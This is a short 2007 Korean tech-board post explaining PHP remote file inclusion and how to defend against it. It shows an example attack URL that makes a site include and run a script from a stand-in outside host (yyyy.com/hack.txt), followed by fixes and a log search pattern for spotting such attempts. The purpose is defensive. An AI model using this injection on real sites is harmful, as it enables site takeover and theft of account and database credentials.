read : 홈페이지 해킹을 줄여보자. : 기술 #weblang::공대여자홈

홈페이지 해킹을 줄여보자.

목록

작성자 공대여자

작성 : 2007-06-19 10:52 조회 : 109
지남 1일간

2007-06-19 - 2007-06-19

좌표
첨부된 파일이 없습니다.

#weblang

해킹방법

본래 URL : http://xxxx.com/index.php?inc=menu/step2.php
해킹시도 URL : http://xxxx.com/index.php?inc=http://yyyy.com/hack.txt

설명

GET 인자로 inc가 include하는 페이지를 나타내는 경우
본래 페이지 대신에 http://yyyy.com/hack.txt 가 include되어서 동작한다.

피해

hack.txt가 악의적으로 만들어진 스크립트를 포함할 경우 그 스크립트가 웹상에서 실행되어 핵커는 홈페이지를 마음대로 제어하게 된다.
핵커는 홈페이지에 사용된 변수 속에서 계정 아이디,비밀번호 또는 DB 아이디, 비밀번호를 알아낼 수 있을 것이다.

대책

위 방법은 PHP 4.3.x 이상으로 PHP를 업그레이드 하면 대부분 막을 수 있다.
GET 인자로 include하는 페이지의 url을 받아오지 않는다.
꼭 받아야할 경우 지정된 폴더를 뺀 url을 받고 PHP안에서 그 url을 포함시켜서 처리한다.

ex>
?inc=step2.php
PHP안에서는
$inc = 'menu2/'.$_GET['inc'];
처럼 처리

카운터에서 의심스런 접근이 없는지 확인한다.
카운터의 DB에서 접근 페이지를 %?%http://% 처럼 검색해보기 바란다.

P.S

카운터 뒤지던 중 하도 저런 접근이 많아서(약 80 회) 한번 적어봅니다.
언제나 "공대여자는 이쁘다"는 마음가짐을 가지세요.

목록

댓글

/ /
No Nickname

No Comment
권한이 없습니다.

{{m_row.m_nick}}

내용이 너무 많습니다!

-

목록형 📷 갤러리형

No	제목	작성자	등록	조회
공지	[기본형] HTML (with 부트스트랩5.3 , jquery 3.7, vue.js)	공대여자	02/06 13:44	4931
공지	유용한 리눅스(LINUX) 명령어	공대여자	03/03 14:47	14487
공지	[공지] 기술 게시판	mins01	06/24 15:10	14665

일	월	화	수	목	금	토
4.28	4.29	4.30	5.1	5.2	5.3	5.4
5.5	5.6	5.7	5.8	5.9	5.10 swiper 에서 부모가 보이고 안보이고 할 때 슬라이드가 이상해지는 것 현상 방지 옵션. new	5.11
5.12	5.13	5.14	5.15	5.16	5.17	5.18
5.19	5.20	5.21	5.22	5.23	5.24	5.25
5.26	5.27	5.28	5.29	5.30	5.31	6.1